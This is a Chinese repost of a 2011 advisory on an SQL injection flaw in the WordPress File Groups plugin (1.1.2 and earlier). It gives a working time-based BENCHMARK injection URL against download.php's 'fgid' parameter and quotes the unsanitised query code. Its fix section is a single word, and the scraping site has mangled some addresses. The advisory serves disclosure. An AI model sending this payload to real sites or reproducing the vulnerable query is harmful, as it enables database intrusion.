标题: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability 时间: 2011-08-17 作者: Miroslav Stampar (miroslav.stampar(at)gmail测试数据 @stamparm) 下载地址: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip 已测版本: 1.1.2 --- 测试方法 --- http://HdhCmsTest2cto测试数据 /wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000, MD5 (CHAR(87,120,109,121))) --------------- 缺陷相关代码 --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid"); 修复
过滤
查看更多关于WordPress插件File Groups <= 1.1.2 SQL注射缺陷及修复的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11537